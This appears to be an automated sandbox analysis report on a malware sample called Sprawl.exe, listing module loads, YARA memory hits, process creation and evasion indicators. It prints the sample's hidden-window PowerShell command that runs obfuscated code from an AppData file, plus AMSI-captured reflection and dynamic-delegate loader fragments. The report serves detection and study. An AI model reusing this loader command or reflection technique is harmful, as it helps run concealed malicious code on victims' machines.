            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Sprawl.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: e.pdb source: powershell.exe, 00000002.00000002.2754688897.0000000007553000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: qm.Core.pdb source: powershell.exe, 00000004.00000002.2832741780.0000000008951000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.2754688897.0000000007553000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: Yara match  File source: 00000004.00000002.2855794933.000000000B95D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match  File source: 00000002.00000002.2786477517.000000000B78B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match  File source: 00000008.00000002.3358316175.0000000005B30000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match  File source: 00000009.00000002.3358056875.0000000006390000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Anti Malware Scan Interface: GetDelegateForFunctionPointer((Ecca $Demiskrdderiers $Djrv), (Risikovilligt @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Ejerbolig = [AppDomain]::CurrentDomain.GetAssemblies()$global:
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Colormaker)), $Reincur).DefineDynamicModule($Leafiest, $false).DefineType($Nielsignes, $Mosegrisen, [System.MulticastDelegate])$Kerneh
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Anti Malware Scan Interface: GetDelegateForFunctionPointer((Ecca $Demiskrdderiers $Djrv), (Risikovilligt @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Ejerbolig = [AppDomain]::CurrentDomain.GetAssemblies()$global:
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Colormaker)), $Reincur).DefineDynamicModule($Leafiest, $false).DefineType($Nielsignes, $Mosegrisen, [System.MulticastDelegate])$Kerneh
            Source: C:\Users\user\Desktop\Sprawl.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"
            Source: C:\Users\user\Desktop\Sprawl.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"
            Source: C:\Users\user\Desktop\Sprawl.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"
            Source: C:\Users\user\Desktop\Sprawl.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 2_2_04D2CA78 push eax; mov dword ptr [esp], edx  2_2_04D2CA8C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 2_2_04D20B35 push ebx; iretd  2_2_04D20B42
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 2_2_04D2D612 push 00000008h; iretd  2_2_04D2D614
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 2_2_0785ED60 pushfd ; ret  2_2_0785ED61
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 2_2_0B792300 pushfd ; ret  2_2_0B79231D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 2_2_0B75C37E push esp; iretd  2_2_0B75C38E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 2_2_0B75EBAF push es; retf  2_2_0B75EBB6
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 2_2_0B75C38F push esp; iretd  2_2_0B75C3AD
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 2_2_0B759074 push eax; ret  2_2_0B7590AC
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 2_2_0B759841 push ebx; retf  2_2_0B759843
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 2_2_0B7598F8 pushad ; retf  2_2_0B7598FB
            Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 8_2_21CE29E0 push eax; ret  8_2_21CE3CA5
            Source: C:\Windows\SysWOW64\msiexec.exe  Code function: 8_2_21CE3C90 push eax; ret  8_2_21CE3CA5
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File created: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Agog\Smriti\Sprawl.exe

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\Sprawl.exe  Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0B75892B rdtsc
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 600000
